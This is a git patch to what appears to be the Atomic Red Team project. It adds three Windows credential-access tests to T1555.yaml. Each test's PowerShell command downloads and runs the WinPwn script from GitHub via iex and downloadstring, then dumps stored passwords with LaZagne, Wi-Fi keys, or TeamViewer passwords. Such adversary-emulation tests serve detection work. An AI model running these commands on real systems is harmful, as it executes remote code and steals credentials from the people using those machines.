From b384c8b7abf8d9953f001fc360997d64f3942568 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 20:20:49 -0500
Subject: [PATCH] Update T1555.yaml (#1948)

* Update T1555.yaml

Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
Loot local Credentials - Wifi Credentials technique via function of WinPwn
Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn

* Update T1555.yaml

added name: powershell

* Update T1555.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1555/T1555.yaml | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml
index c6338e2c..683ec9b9 100644
--- a/atomics/T1555/T1555.yaml
+++ b/atomics/T1555/T1555.yaml
@@ -69,3 +69,36 @@ atomic_tests:
     elevation_required: false
     command: |
       vaultcmd /listcreds:"Web Credentials" /all
+- name: WinPwn - Loot local Credentials - lazagne
+  description: |-
+    The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. 
+    Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). 
+    This tool has been developed for the purpose of finding these passwords for the most commonly-used software
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      lazagnemodule -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - Loot local Credentials - Wifi Credentials
+  description: Loot local Credentials - Wifi Credentials technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      wificreds -consoleoutput -noninteractive  
+    name: powershell
+- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
+  description: Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      decryptteamviewer -consoleoutput -noninteractive  
+    name: powershell